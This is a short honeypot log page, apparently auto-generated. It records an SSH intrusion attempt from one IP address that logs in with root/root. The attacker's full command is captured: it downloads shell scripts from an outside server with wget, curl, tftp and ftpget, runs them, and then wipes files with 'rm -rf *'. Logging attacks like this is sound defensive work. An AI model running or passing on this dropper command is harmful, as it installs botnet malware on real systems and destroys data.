honeypots.tk

Record Observations : 157.230.169.36 ssh Web script execution 157.230.169.36 M3KO8IZBZLP6JOI6

<< Back

157.230.169.36 client username 'root' and password 'root' entered
157.230.169.36 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.39.47/Pemex.sh; curl -O http://185.244.39.47/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 185.244.39.47 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 185.244.39.47; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.244.39.47 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *'
Author: Honeypots.tk Robot